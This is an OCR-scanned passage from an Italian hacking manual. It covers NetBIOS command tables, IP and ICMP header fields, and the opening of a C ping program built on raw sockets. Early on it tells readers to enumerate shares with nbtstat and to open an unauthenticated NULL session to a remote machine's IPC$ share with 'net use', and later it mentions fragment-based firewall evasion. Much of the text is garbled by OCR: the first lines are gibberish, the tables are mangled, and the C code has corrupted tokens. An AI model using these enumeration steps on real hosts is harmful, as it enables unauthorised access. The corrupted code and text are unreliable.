Intprfppp hi iq\/ Xhp Mpt Rìhq czinnriì pyppi itp hppai iqp it ia/sq ppIIpH 
Il liei ictOc UUoy. I l le IMCI DlUo Udì II lui CAcOUlc UcUaUoc II VVdo Od II CU 

from an interrupt handler. 


9? 


Tnn manu rnmmanHQ ìqqiipH 
i uu 1 1 idi iy uui 1 1 1 1 idi iuo looueu. 


Cu 


ln\/aliH 1 AM aHantpe (\ AMA\ ni imhpr 

Il 1 V di IU L/AI NI dUdU lei \ l_AAI \r\) 1 1 U 1 1 1 uci . 


24 


Command compieteci before canceled. Returned in CANCEL NCB 
when target command completed normally. 


26 


Invalid cancel command. The target NCB could not be found. 


40-FE 


Hardware error. FF Indicates the command has not completed. 



Il valore dovrebbe essere <20> come nella taballa che segue. 
NetBIOS Remote Machine Name Table 

Name Type Status 



KEVIN <00> UNIQUE 

@H0 <00> GROUP 

KEVIN <20> UNIQUE 

TINY <03> UNIQUE 



Registered 
Registered 
Registered 
Registered 



MAC Address = 00-50-04-05-E2-B9 

Nel caso si vedesse qualche cosa di condiviso sarebbe possibile tentare di dare : 
net use x: \\ip.add.re.ss\sharename 

Questo cercherebbe di abbinare ala risorsa locale X: quella condivisa. 

In ogni caso vediamo come si può' cercare di utilizzare una connessione NULL. 

Nel caso del comando visto prima 

C:> nbtstat-A 192.197.45.123 

il server interroga per * mediante un messaggio di broadcast. 

Tutte le macchine ricevono la richiesta e rispondono in modo adeguato. 

Blocate il capture dello sniffer e guardate il risultato. 

Solo gli hots che sono in acolto della porta UDP 137 risponderanno a questa query. 
Questa sarà la rete primaria basata su PC dalla quale riceverete una certa quantità di 
risposte positive. 

Ora si tratterà di creare una di quelle definite come nuli session ovvero quelle in cui una 
macchina NT remota creerà una connessione senza richiedere utente e password. 
Date il comando : 

c:> net use \\computer\ipc$ "" /user:"" 

dove computer è il nome NetBios, il nome dns oppure l'IP 

Le connessioni NULL sno necessarie in quanto sono il metodo con cui una macchina può 
loggare dentro ad un server per avere certe informazioni. 
Quello che è possibile fare dipende dal livello dei service pack. 
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Più questo è alto meno potrete fare. 

In ogni caso i servizi potrebbero essere quelli di accedere al registro e cose di questo tipo. 
Appendice 

Codici errori NetBios 



NCB Field Input / Output Summary 



Command 
name 


CMD 


RET 


LSN 


NUM 


AD 
R 


LEN 


CALLNA 
ME 


NA 
ME 


RT 

0 


ST 
0 


LANA 


DO 
NE 


RESET 


1 


0 


1 


1 




_ 










1 


0 


CANCEL 


1 


0 


- 


- 


1 


- 


- 


- 


- 


- 


1 


0 


ADAPTER 

OT A TI IO 

STATUS 


1 


0 


- 


- 


1 


I/O 


1 


- 


- 


1 


1 


0 


1 1 h 1 1 1 N 1 1 / 

UNLINK 


1 


0 


















1 


0 




























ADD NAME 


1 


0 


_ 


0 


_ 


_ 


_ 


1 


_ 


1 


1 


0 


ADD GROUP 
NAME 


1 


0 


- 


0 


- 


- 


- 


1 


- 


1 


1 


0 


DELETE 
NAME 


1 


0 












1 




1 


1 


0 




























CALL 


1 


0 


0 




- 


- 


1 


1 


1 


1 


1 


0 


LISTEN 


1 


0 


0 








I/O 


1 


1 


1 


1 


0 


HANG UP 


1 


0 


1 














1 


1 


0 


SESSION 


1 


0 


- 


- 


1 


I/O 


- 


1 


- 


1 


1 


0 




























SEND 


1 


0 


1 




1 


1 








1 


1 


0 


CHAIN SEND 


1 


0 


1 




1 


1 


1 






1 


1 


0 


RECEIVE 


1 


0 


1 




1 


I/O 








1 


1 


0 


RECEIVE 
ANY 


1 


0 


0 


1 


1 


I/O 








1 


1 


0 




























SEND 

DATAGRAM 


1 


0 




1 


1 


1 


1 






1 


1 


0 




1 


0 




1 


1 


I/O 


0 






1 


1 


0 
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DATAGRAM 


























SEND 

BROADCAS 
T 


1 


0 




1 


1 


1 








1 


1 


0 


RECV 

BROADCAS 
T 


1 


0 




1 


1 


I/O 


0 






1 


1 


0 



Legend I = Field is input (passed to Net Bios) O = Field is output (returned by Net Bios) I/O = 
Field is used for both input and output 

Net Bios Command Summary 



Command 


Wait 


No 
Wait 


Name 


General Commands 








RESET 


32 


— 


Reset Net Bios. 


CANCEL 


35 


— 


Cancel a pending command. 


ADAPTER STATUS 


33 


B3 


Get status of a Net Bios. 


UNLINK 


70 




Cancel boot redirection. 


Name Commands 








ADD NAME 


30 


B0 


Add unique name to name table. 


ADD GROUP NAME 


36 


B6 


Add non-unique name to table. 


DELETE NAME 


31 


B1 


Delete name from name table. Session 
Control Commands 


CALL 


10 


90 


Establish session with another. 


LISTEN 


11 


91 


Wait for a CALL from another. 


HANG UP 


12 


92 


Close session. 


SESSION STATUS 


34 


B4 


Status of sessions under name. 


Session Data Transfer 
Commands 








SEND 


14 


94 


Send session data. 


CHAIN SEND 


17 


97 


Concatenate and send two buffers. 


RECEIVE 


15 


95 


Receive session data. 


RECEIVE ANY 


16 


96 


Receive data from any session under 
specified name. 
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L/cUciy i di 1 1 \_/Ui 1 1 1 1 idi ilio 








OI_l\U VJ r\ 1 AAvJ IlAAl VI 


?n 


AD 


CanH Hotel arlrlroccoH h\\/ nomo 
Ocl IU UdLd, dUUIdoocU Uy lidi Ile?. 


RECEIVE 
DATAGRAM 


21 


A1 


Receive datagram to name. 


SEND BROADCAST 


22 


A2 


Send data to ali stations. 


RECEIVE 
BROADCAST 


23 


A3 


Enable receive of next broadcast. 



1 1 protocollo I P 

Abbiamo detto che l'instradamento dei pacchetti avviene tramite il protocollo IP il qale grazie 
all'intestazione presente nell'header di ogni singolo pacchetto permette di stabilire quale 
strada debbano prendere i vari pacchetti per partire da un nodo e raggiungerne un altro. 
Il protocollo IP rappresenta un esempio di servizio senza connessione in quanto consente lo 
scambio di dati tra due sistemi senza alcuna impostazione preliminare della chiamata. E' 
proprio per questo motivo che vi è sempre la possibilità che i dati vengano persi prima di 
giungere alla stazione destinazione. 
Vediamo subito com'è composto l'header del pacchetto IP. 



0 4 E 


5 16 




31 


Vers 


Hlen 


Service Type 


Total Length 


Identif ication 


Flags 


Fragment Offset 


Time to Live 


Protocol 


Header 


Checksum 






Source IP 


Àddress 










Dest inat ion. 


IP Address 








Options + 


Paddi ng 







Figura 4 II pacchetto IP 



Il significato dei vari campi è il seguente. 
VERS FIELD 

Questo campo è costituito da 4 bits i quali identificano la versione del protocollo IP utilizzato 
per la creazione del datagramma. 

Questo numero è quello che siamo abituati a vedere come IPV4 e IPV6 e precisamente è 4 
per la versione attuale mentre è 6 per quella successiva. 



HLEN E TOTAL LENGTH FIELDS 



Questo campo è lungo anch'esso 4 bits e segue quello della versione. 
Rappresenta la lunghezza dell'header in numero di parole a 32 bits. 

Comparato al campo della lunghezza totale questo indica la lunghezza totale del datagramma 
per includere il suo header e le principali informazioni sul layer. 

Dato che la sua lunghezza è di 16 bits un datagramma IP può essere fino a 2 A 16 o 65535 
ottine in lunghezza. 

SERVICE TYPE FIELD 

Lo scopo è quello di indicare come viene processato il datagramma. 

Tre degli otto bits del campo sono utilizzati per indicare la precedenza o il livello di importanza 
assegnato dal mittente. 
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Di conseguenza questo campo convalida un meccanismo di priorità usato nell'instradamento 
del datagramma IP. 

IDENTIFICATION AND FRAGMENT OFFSET FIELDS 

Il campo di identificazione abilita ogni datagramma o frammento di questo ad essere 
identificato. 

Se il datagramma è frammentato in due o più pezzi, il campo FRAGMENT OFFSET specifica 

l'offset nel datagramma originale dei dati che stanno per essere trasportati. 

In questo modo il campo indica da dove il frammento deriva nel messaggio completo. 

Il valore attuale è un intero che corrisponde ad un unità di otto ottine capaci di fornire un 

offset in unità a 64bits. 

È veramente importante dal punto di vista della sicurezza che il device sia in grado di 
identificare tutti i frammenti a quale datagramma appartengono. 

Alcuni recenti tipi di attacchi portati a firewall e a routers bloccano i frammenti iniziali mentre 
permettono il passaggio degli ultimi prendendo un vantaggio dal fatto che le informazioni dello 
strato 4 sono presenti solo nel primo frammento del datagramma. 

Non appena questo frammento viene bloccato, se il device bloccato non tiene traccia 
registrata dei pacchetti scartati inizialmente potrebbe lasciare passare ogni successivo 
frammento non autorizzato. 

Anche se un attuale connessione con un applicazione non potrebbe essere stabilita senza le 
informazioni di header relativi allo strato 4 presenti nel primo frammento, un attaccante 
potrebbe essere capace di creare un DENIAL OF SERVICE inviando molti frammenti di 
datagramma ad uno particolare host. 

Questo host potrebbe trattenere i frammenti in memoria attendendo che tutti questi siano 
arrivati consumando una quantità notevole di risorse. 

TIME TO LIVE FIELD 

Il campo Time to Live (TTL) specifica il tempo massimo durante il quale un datagramma può 
eistere. 

Lo scopo di questo campo è quello di prevenire il fatto che un datagramma indirizzato in 
modo scorretto girovaghi all'infinito sulla rete. 

Dato che un tempo preciso è difficile da misurare questo viene usato come contatore dai 
routers. 

In altre parole i routers decrementano di un unità questo valore ogni volta che passa un 
sistema. 

Quando il suo valore raggiunge 0 il datagramma viene scaricato. 
FLAGS FIELD 

In questo campo sono contenuti due bits che servono ad indicare se si è verificata una 
frammentazione mentre il terzo bit non è ancora utilizzato. 

Il settaggio di uno dei due bits può essere utilizzato come controllo diretto del meccanismo 
della frammentazione dato che un valore di 0 indica che il datagramma può essere 
frammentato mentre un valore di 1 indica che non lo può essere. 

Il secondo bit settato a 0 indica che il frammento del datagramma è l'ultimo mentre se questo 
vale 1 significa che airi frammenti seguiranno. 



Lo scopo di questo campo è quello di identificare il livello più alto usato per creare il 
messaggio trasportato nel datagramma. 

Ad esempio il valore 6 indica il protocollo TCP mentre il valore 17 indica UDP. 
Header Checksum 

Questo campo serve ad assicurare che le informazioni dell'intestazione non si siano rovinate 
durante il transito. 

Questa somma di controllo vale soltanto per la porzione dell'intestazione del pacchetto. 

Da ciò ne deriva una ridotta elaborazione a ciascun instradatore, perché la somma di 

controllo non è calcolata sull'intero pacchetto. 

A ciascun instradatore che il pacchetto attraversa, il valore Header Checksum deve essere 
calcolato di nuovo, perché il campo TTL decresce per ciascun instradatore, obbligando quindi 
a svolgere un nuovo calcolo. 
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Address Source e Destination 

I campi Source IP Address e Destination IP Address, contengono gli indirizzi IP a 32 bit degli 
host mittente e destinatario. 

Naturalmente, questi due valori non devono mutare durante il transito 



Questo campo può essere costituito da parecchi codici di lunghezza variabile. In un pacchetto 
IP, si può utilizzare più di una opzione. In tale caso, i campi appaiono in sequenza 
nell'intestazione IP. Ciascuna opzione è lunga 8 bit e consiste in tre sottocampi. 
Il primo bit rappresenta il "copy flag", che determina il modo in cui questa opzione deve 
essere trattata quando un pacchetto origine è frammentato. 

Se il copy flag è impostato su 0, l'opzione deve essere solo copiata sul primo frammento. 

Se il copy flag è impostato su 1, l'opzione deve essere copiata su tutti i frammenti del 

pacchetto originale. 

La "option class" è rappresentata da 2 bit e le può essere assegnato uno tra quattro valori. 
Il valore 0 significa che l'opzione ha a che fare con un controllo del datagramma o della rete. 
Il valore 2 significa che l'opzione serve a scopo di debug o di misurazione. I valori 1 e 3 sono 
riservati per usi futuri e non sono ancora stati definiti. 

I 5 bit finali, rappresentano lo "option number", che assume significato in base al valore della 
"option class", secondo la tabella che segue: 



Option Class Option Number Descrizione 

0 0 Termine dell'elenco delle opzioni 

0 1 Usata come riempitivo. Indica che non vi sono opzioni 

impostate 

0 2 Opzioni della sicurezza per applicazioni militari 

0 3 Instradamento della fonte non ben definito. Questa opzione 

indica una sequenza di indirizzi IP che dovrebbe essere 
usata come percorso fino ad un host destinatario. Consente 
che si verifichino parecchi salti di rete tra gli indirizzi indicati 
dall'origine 

0 7 Usato per tener traccia dei percorsi fino ad una destinazione. 

E' utile per determinare l'esatta strada percorsa tra un host 
origine e uno destinatario. Ogni instradatore che si trova tra 
le mani il pacchetto IP aggiunge il proprio indirizzo IP 
nell'elenco delle opzioni 

0 9 Instradamento della fonte preciso. Come accade per 

l'instradamento non ben definito, specifica un percorso di 
instradamento per un host destinatario. La differenza è che, 
se non può percorrere la strada indicata, il pacchetto viene 
scartato 

2 4 Marcatura di orario Internet che consente la registrazione di 

segnatempi che indicano il tempo trascorso lungo una strada. 
Ciascun instradatore annota il proprio indirizzo IP e un 
segnatempo, che indica il momento in cui ha avuto per 
le mani il pacchetto. Questo segnatempo si basa sui 
millisecondi trascorsi dalla mezzanotte sul meridiano di 
Greenwich (Greenwich Mean Time o Universal Time). 
Poiché, però, gli orologi non sono sincronizzati, è bene 
considerare questi segnatempo solo come stime dell'ora 
esatta 



Padding 

I contenuti di questo campo si basano sulle opzioni selezionate per un pacchetto IP. 

II riempitivo assicura che l'intestazione del datagramma sia arrotondata su di un numero pari 
di byte. 
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I cmp 

Dopo aver notato che molte persone che frequentano alcune delle MAIL LIST a cui partecipo 
sono interessate al discorso dei protocolli, ho deciso di redare alcuni testi da distribuire in 
questi ambiti al fine di descrivere i principi su cui si basano i vari strati delle reti con 
particolare attenzione a quelli Internet includendo in questi anche degli esempi pratici scritti in 
Linguaqgio C. 

Come abbiamo detto nella parte iniziale spesso si parla di TCP e di IP trascurando altri 
protocolli che di fatto non sono meno importanti di questi due. 

Molte funzioni di controllo infatti non sarebbero possibili senza la presenza di strati particolari 
di rete in cui è possibile reperire protocolli come ICMP. 

ICMP sta per Internet Control Message Protocol ovvero uno strato della rete utilizzato per la 
comunicazione degli errori e interessato a fornire informazioni importantissime legate al 
protocollo IP. 

ICMP viene descritto dal RFC792 e dall'update 950. 

Lo scopo fondamentale del protocollo è quello ci eseguire funzioni di controllo nella 
comunicazione tra hosts come ad esempio la segnalazione di errori che possono avvenire 
nell'ambito di queste comunicazioni. 

Quando un router o un host di destinazione deve informare l'host di origine relativamente ad 

errori avvenuti processando il datagramma, questi utilizzano appunto ICMP. 

I messaggi ICMP vengono spediti in datagrammi IP i quali possiedono la seguente struttura : 




(contente depend on (ype and code) 



L'incapsulazione di un pacchetto ICMP completo è : 




user data 



Ethernet 



L'incapsulazione è l'aggiunta di un Protocol Control Information (PCI) ad una Protocol Data 
Unit(PDU). 

Il protocollo ICMP può svolgere infatti diversi tipi di compiti 

Nel caso di messaggi ICMP il I' header IP possiede un campo realtivo al numero di protocollo 
sempre forzato ad essere a 1 . 
L' header del pacchetto IP è : 



IP Header Length (in 32-bitwords) 



Numberof 
network 
hops \ 



Add-ess of 
serding ^ 
node 

Àdctess of 
intended 
receivirg 
node 



^.Type of Service 
(Net used) 

15 16 



Size of datagram (header + data) 



31 



ToS 



1 6-bit identification 



TTI 



protocol 



__Flags &, Fragmentation 
1 6-l^j^ajJarath-— ~T ~^f to split large rnessages 



flagsTTTbit fragrnent offset 



1 6-bit header checksurn 



f 32-bitsource IP adetess 



!i 2-bit desti ratio n IP adetess 



irto a series oflP packete 



20 



Flags 




--X 


More 


-X - 


Dont Fragrnent 


X -- 


Unused 



1 data 


v 1 







Type of transport protocol to be used 



Checksurn to detectany 
corruption of the IP 
header within a router 
Data to be sent to receivirg node 
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Il campo dati IP contiene l'attuale messaggio ICMP nel formato come mostrato nello schema 
precedente. 

I valori che può assumere il campo TYPE descrivono il tipo di servizio che il protocollo ICMP 
deve compiere e i valori che può assumere sono : 



Tvoe 


NcLItlB 


Re feren ce 


0 


Echo Reply 


[RFC 7 92] 


1 


Unasslgned 


[JBP] 


2 


Unasslgned 


[JBP] 


3 


Destination Unreachable 


[RFC792] 


4 


Source Quench 


[RFC792] 


5 


Redirect 


[RFC792] 


6 


Alternate Host Address 


[JBP] 


7 


Unasslgned 


[JBP] 


8 


Echo 


[RFC792] 


9 


Router Advertisement 


[RFC1256] 


10 


Router Selection 


[RFC1256] 


11 


Time Exceeded 


[RFC 7 92] 


12 


Parameter Problem 


[RFC792] 


13 


Timestamp 


[RFC792] 


14 


Timestamp Reply 


[RFC792] 


15 


Information Request 


[RFC792] 


16 


Information Reply 


[RFC792] 


17 


Address Mask Request 


[RFC950] 


18 


Address Mask Reply 


[RFC950] 


19 


Reserved (for Security) 


[Solo] 


20-29 


Reserved (for Robustness Experiment) [ZSu] 


30 


Traceroute 


[RFC1393] 


31 


Datagram Conversion Error 


[RFC14 75] 


32 


Mobile Host Redirect 


[David Johnson] 


33 


IPv6 Where-Are-You 


[Bill Simpson] 


34 


IPv6 I-Am-Here 


[Bill Simpson] 


35 


Mobile Registration Request 


[Bill Simpson ] 




Mobile Registration Reply 


[Bill Simpson] 



Nell'esempio di PING che seguirà l'assegnazione dei valori di TYPE e di code vengono 
inseriti nell'apposita struttura dal codice : 

idefine ICMP_ECHO 8 
icmp_hdr = ( IcmpHeader* ) icmp_data; 

icmp_hdr->i_type = ICMP_ECHO; / / Request an ICMP echo 

icmp_hdr->i_code = 0; 

icmp_hdr->i_id = (USHORT) GetCurrentProcessId () ; 




Molti TYPE possiedono un CODE il quale invece contiene il codice derrore per il 
datagramma riportato nel messaggio ICMP. 

Type Name 



0 Echo Reply (used by "ping") 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



Codes 

0 No Code 

1 Unassigned 

2 Unassigned 

3 Destination Unreachable 
Codes 

0 Net Unreachable 

1 Host Unreachable 

2 Protocol Unreachable 

3 Port Unreachable 

4 Fragmentation Needed and Don't Fragment was Set 

5 Source Route Failed 

6 Destination Network Unknown 

7 Destination Host Unknown 

8 Source Host Isolated 

9 Communication with Destination Network is 
Administratively Prohibited 

10 Communication with Destination Host is 
Administratively Prohibited 

11 Destination Network Unreachable for Type of Service 

12 Destination Host Unreachable for Type of Service 

4 Source Quench 
Codes 

0 No Code 

5 Redirect 
Codes 

0 Redirect Datagram for the Network (or subnet) 

1 Redirect Datagram for the Host 

2 Redirect Datagram for the Type of Service and Network 

3 Redirect Datagram for the Type of Service and Host 

6 Alternate Host Address 
Codes 

0 Alternate Address for Host 

7 Unassigned 

8 Echo 

(used by "ping") 
Codes 

0 No Code 

9 Router Advertisement 
Codes 

0 No Code 

10 Router Selection 
Codes 

0 No Code 

11 Time Exceeded 
Codes 

0 Time to Live exceeded in Trans it 

1 Fragment Reassembly Time Exceeded 

12 Parameter Problem 
Codes 

0 Pointer indicates the error 

1 Missing a Required Option 

2 Bad Length 

13 Timestamp 
Codes 

0 No Code 

14 Timestamp Reply 
Codes 

0 No Code 

15 Information Request 
Codes 
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0 No Code 

16 Information Reply 
Codes 

0 No Code 

17 Address Mask Request 
Codes 

0 No Code 

18 Address Mask Reply 
Codes 

0 No Code 

19 Reserved (for Security) 

20-29 Reserved (for Robustness Experiment) 

30 Traceroute 

31 Datagram Conversion Error 

32 Mobile Host Redirect 

33 IPv6 Where-Are-You 

34 IPv6 I-Am-Here 

35 Mobile Registration Request 

36 Mobile Registration Reply 



Il CHECKSUM contiene un valore a 16 bits calcolato partendo dal campo TYPE 
Chiaramente la parte ICMP DATA contiene le informazioni del massaggio ICMP dipendenti 
dal TYPE. 

I tipi di messaggi sono quelli che seguono e che ora vedremo uno ad uno. 



Echo (8) e Echo Reply (0) 



Identifier 


sequenze number 


Data .... 



U ECHO viene utilizzato per testare la presenza di un HOST sulla rete. 

Chi invia inizializza l'identificatore e il numero di sequenza, aggiunge alcuni dati dentro 

all'apposita zona ed invia il pacchetto al destinatario. 

Il ricevente cambia il typo da ECHO a ECHO REPLY e res6tituisce il datagramma al mittente. 
Questo meccanismo viene utilizzato dalle funzioni di PING e quindi anche di TRACE ROUTE. 
La funzione di PING è sicuramente quella più utilizzata per testare la raggiungibilità di un 
determinato host in un ambito di rete. 

Questa funzione viene ottenuta generando un messaggio ICMP di richiesta ECHO e 
indirizzando questo verso un determinato indirizzo. 

La creazione di un programma in linguaggio C relativa al PING dovremo eseguire i seguenti 
steps. 

1 Creazione di un SOCKET di tipo SOCK_RAW e protocollo IPPROTOJCMP 

2 Creazione ed inizializzazione dell'header ICMP 

3 Richiamo della funzione sendto oppure WSASendto per inviare la richiesta ICMP all'host 
remoto. 

4 Richiamo della funzione recvfrom oppure WSARecvfrom per ricevere la risposta ICMP 

Quando eseguite la spedizione della richiesta ECHO la macchina di destinazione intercetta la 
query generando una risposta ECHO REPLY e rinviandola a voi. 
Vediamo le varie parti ad una ad una. 
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Per prima cosa sarà necessario includere gli HEADER del linguaggio C in cui ci sono le 
definizioni necessarie per la scrittura delle funzioni di trasmissione su rete. 
Per le funzioni di rete sono state utilizzate le librerie Windows Socket delle quali riporto 
soltanto un riassunto nella tabella che segue. 



Routine 
WSAAccept l 

WSAAsyncGetHostByAddr 2 3 

WSAAsyncGetHostByName 2 3 

WSAAsyncGetProtoByName 2 3 

WSAAsyncGetProtoByNumber 2 3 

WSAAsyncGetServByName 2 3 

WSAAsyncGetServByPort 2 3 

WSAAsvncSelect 3 

WSACancelAsyncRequest 2 3 

WSACleanup 

WSACIoseEvent 

WSAConnect l 

WSACreateEvent 

WSADuplicateSocket 

WSAEnumNetworkEvents 

WSAEnumProtocoIs 

WSAEventSelect 

WSAGetLastError 3 

WSAGetOverlappedResult 

WSAGetQOSByName 

WSAHtonl 

WSAHtons 

WSAIoctM 

WSAJoinLeaf l 

WSANtohl 

WSANtohs 

WSAProviderConfiqChanqe 
WSARecv I 

WSARecvFrom l 

WSAResetEvent 
WSASend l 

WSASendTo l 

WSASetEvent 

WSASetLastError 3 

WSASocket 

WSAStartup 3 

WSAWaitForMultipleEvents l 



Meaning 

An extended version of accept , which allows for conditional acceptance. 

A set of functions that provide asynchronous versions of the standard 
Berkeley getXbyY functions. For example, the 
WSAAsyncGetHostByName function provides an asynchronous, 
message-based implementation of the standard Berkeley 
gethostbyname function. 



Performs asynchronous version of select . 

Cancels an outstanding instance of a WSAAsyncGetXByY function. 
Signs off from the underlying Windows Sockets .dll. 
Destroys an event object. 

An extended version of connect which allows for exchange of connect 
data and QOS specification. 

Creates an event object. 

Allows an underlying socket to be shared by creating a virtual socket. 

Discovers occurrences of network events. 

Retrieves information about each available protocol. 

Associates network events with an event object. 

Obtains details of last Windows Sockets error. 

Gets completion status of overlapped operation. 

Supplies QOS parameters based on a well-known service name. 

Extended version of htonl. 

Extended version of htons. 

Overlapped-capable version of IOCTL. 

Adds a multipoint leaf to a multipoint session. 

Extended version of ntohl. 

Extended version of ntohs. 

Receives notifications of service providers being installed/removed. 

An extended version of recv which accommodates scatter/gather I/O, 
overlapped sockets and provides the flags parameter as in, out. 

An extended version of recvfrom which accommodates scatter/gather 
I/O, overlapped sockets and provides the flags parameter as in, out. 

Resets an event object. 

An extended version of send which accommodates scatter/gather I/O 
and overlapped sockets. 

An extended version of sendto which accommodates scatter/gather I/O 
and overlapped sockets. 

Sets an event object. 

Sets the error to be returned by a subsequent WSAGetLastError. 

An extended version of socket which takes a WSAPROTOCOL INFO 

structure as input and allows overlapped sockets to be created. 

Initializes the underlying Windows Sockets .dll. 
Blocks on multiple event objects. 
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1 The routine can block if acting on a blocking socket. 

2 The routine is always realized by the name resolution provider associated with the default TCP/IP service 
provider, if any. 

3 The routine was originally a Windows Sockets 1 .1 function 

Adesso iniziamo a vederev passo a passo la scrittura del programma di PING partendo dalla 
definizione delle strutture relative al protocollo. 

#define WIN32_LEAN_AND_MEAN 
^include <winsock2 . h> 
#incl ude <ws2tcpip . h> 
^include <stdio. h> 
^include <stdlib.h> 

#define IP_RECORD_ROUTE 0x7 

// 

// IP header structure 

// 

typedef struct _iphdr 
{ 



unsigned 


int 


h_len : 4; 


// Length of the header 


unsigned 


int 


ver sion : 4; 


// Ver sion of IP 


unsigned 


char 


tos; 


// Type of service 


unsigned 


short 


total_len; 


// Total length of the packet 


unsigned 


short 


ident; 


// Unique identifier 


unsigned 


short 


frag_and_flags; 


// Flags 


unsigned 


char 


ttl; 


// Time to live 


unsigned 


char 


proto; 


// Protocol (TCP, UDP, etc.) 


unsigned 


short 


checksum; 


// IP checksum 


unsigned 


int 


sourcelP; 




unsigned 


int 


destIP; 





} IpHeader; 

idefine ICMP_ECHO 8 
#define ICMP_ECHOREPLY 0 

#define ICMP_MIN 8 // Minimum 8-byte ICMP packet (header) 

// 

// ICMP header structure 

// 

typedef struct _icmphdr 
{ 

BYTE i_type; 

BYTE i_code; // Type sub code 

USHORT i_cksum; 
USHORT i_id; 
USHORT i_seq; 

// This is not the standard header, but we reserve space for time 
ULONG timestamp; 
} IcmpHeader; 

// 

// IP option header — use with socket option IP_OPTIONS 

// 

typedef struct _ipoptionhdr 
{ 

unsigned char code; // Option type 

unsigned char len; // Length of option hdr 
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unsigned char 


ptr; 


// Offset Into options 


unsigned long 


addr[9] ; 


// List of IP addrs 


} IpOptionHeader; 






#define DEF_PACKET_ SIZE 


32 


// Default packet size 


#define MAX_PACKET 


1024 


// Max ICMP packet size 


#define MAX_IP_HDR_SIZE 


60 


// Max IP header size w/options 


BOOL bRecordRoute ; 






int datasize; 







Ora creaiamo una funzione che mostrerà il modo di utilizzo del programma. 
// 

// Function: usage 

// 

// Description: 

// Print usage information 

// 

void usage (char *progname) 
{ 

print f ("usage: ping -r <host> [data size] \n") ; 

print f(" -r record route\n") ; 

printf (" host remote machine to Ping\n") ; 

print f(" datasize can he up to 1 KB\n ") ; 

ExitProcess (-1) ; 



Ora un'altra funzione sarà necessaria per poter inserire i campi dentro alla struttura ICMP 
// 

// Function: FillICMPData 

// 

// Description: 

// Helper function to fili in various fields for our ICMP request 

// 

void FillICMPData (char *icmp_data, int datasize) 
{ 

IcmpHeader *icmp_hdr = NULL; 
char *datapart = NULL; 

icmp_hdr = (IcmpHeader*) icmp_data; 

icmp_hdr->i_type = ICMP_ECHO; // Request an ICMP echo 

icmp_hdr->i_code = 0; 

icmp_hdr->i_id = (USHORT) GetCurrentProcessId () ; 
icmp_hdr->i_cksum = 0; 
icmp_hdr->i_seq = 0; 



datapart = icmp_data + sizeof (IcmpHeader) ; 

// 

// Place some junk in the buffer 

// 

memset (datapart, 'E', datasize - sizeof (IcmpHeader) ) ; 



Come abbiamo visto nella descrizione del protocollo precedente è necessario inserire dentro 

ad uno dei campi della struttura il CHECKSUM. 

Per questo motivo è necessaria una funzione che lo calcoli. 
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// Function: checksum 

// 

// Descriptlon : 

// This function calculates the 16-bit one's complement sum 
// of the supplied buffer (ICMP) header 

// 

USHORT checksum (USHORT *buffer, int size) 
{ 

unsigned long cksum=0; 

while (size > 1) 
{ 

cksum += *buffer++; 
size -= sizeof (USHORT) ; 

} 

if (size) 
{ 

cksum += * (UCHAR*) buffer; 

ì 

cksum = (cksum » 16) + (cksum & Oxffff); 
cksum += (cksum »16) ; 
return (USHORT) (~cksum) ; 



La successiva funzione controlla se è presente l'opzione relativa all'header IP. 
In caso affermativo trova l'opzione IP e stampa l'opzione del record route . 

// 

// Function: DecodelPOptions 

// 

// Description: 

// If the IP option header is present, find the IP options 
// within the IP header and print the record route option 
// values 

// 

void DecodelPOptions (char *buf, int bytes) 
{ 

IpOptionHeader *ipopt = NULL; 

IN_ADDR inaddr; 

int i; 

HOSTENT *host = NULL; 

ipopt = (IpOptionHeader *) (buf + 20) ; 

print f ("RR: ") ; 

for(i = 0; i < (ipopt->ptr / 4) - 1; i++) 
{ 

inaddr .S_un. S_addr = ipopt ->addr [i] ; 
if (i != 0) 

print f(" "); 
host = gethostbyaddr ( (char *) sinaddr . S_un. S_addr, 
sizeof (inaddr. S_un . S_addr) , AF_INET) ; 

if (host) 

printf (" (%-15s) %s\n", inet_ntoa (inaddr) , host->h_name) ; 
else 

printf ( " (%-15s) \n ", inet_ntoa (inaddr) ) ; 

} 
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Dato che la risposta è un header IP la funzione che segue decodifica questo header 
ricercando i dati ICMP. 

// 

// Function: DecodeICMPHeader 

// 

// Description : 

// The response is an IP packet . We must decode the IP header to 
// locate the ICMP data. 

// 

void DecodeICMPHeader (char *buf, Int bytes, 
struct sockaddr_in *from) 

{ 

IpHeader *lphdr = NULL; 

IcmpHeader *icmphdr = NULL; 

unsigned short iphdrlen; 
DWORD tick; 
static Int icmpcount = 0; 

Iphdr = (IpHeader *)buf; 

// Number of 32 -bit words * 4 = bytes 

iphdrlen = iphdr->h_len * 4; 

tick = GetTickCount () ; 

if ((iphdrlen == MAX_IP_HDR_SIZE) && (! icmpcount) ) 
DecodelPOptions (buf, bytes) ; 

if (bytes < iphdrlen + ICMP_MIN) 
{ 

printf ("Too few bytes from %s\n", 
inet_ntoa (from->sin_addr) ) ; 

) 

icmphdr = (IcmpHeader*) (buf + iphdrlen) ; 

if (icmphdr->i_type != ICMP_ECHOREPLY) 
{ 

printf ("nonecho type %d recvd\n" , icmphdr->i_type) ; 
return; 

ì 

// Make sure this is an ICMP reply to something we sent ! 

// 

if (icmphdr->i_id '.= (USHORT) GetCurrentProcessId() ) 
{ 

printf ("someone else's packet ! \n") ; 
return ; 

} 

printf ("%d bytes from %s:", bytes, inet_ntoa (from->sin_addr) ) ; 
printf (" icmp_seq = %d. ", icmphdr->i_seq) ; 
printf (" time: %d ms", tick - icmphdr->timestamp) ; 
printf ("\n") ; 

icmpcount++ ; 
return; 



Infine ci sono la funzione MAIN e quell ache esegue la validazione degloi argomenti passati a 
questa. 

void ValidateArgs (int argc, char **argv) 
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int i; 

bRecordRoute = FALSE; 

lpdest = NULL; 

datasize = DEF_PACKET_ SIZE; 

for(i = 1; 1 < argc; i++) 
{ 

if (<argv[±][0] == '-') Il (argv[i] [0] == '/')) 
{ 

switch (tolower (argv[i] [1] ) ) 
{ 

case 'r' : // Record route option 

bRecordRoute = TRUE; 

break; 
de fault : 

usage (argv[0] ) ; 

break; 

} 

} 

else if (isdigit (argv[i] [0] ) ) 
datasize = atoi (argv[i] ) ; 

else 

lpdest = argv[i]; 



} 



// 

// Function: main 

// 

// Description: 

// Set up the ICMP raw socket, and create the ICMP header. Add 
// the appropriate IP option header, and start sending ICMP 
// echo requests to the endpoint . For each send and receive, 
// we set a timeout value so that we don't wait forever for a 
// response in case the endpoint is not responding. When we 
// receive a packet, decode it. 
// 

int main (int argc, char **argv) 
{ 

WS AD ATA wsaData; 

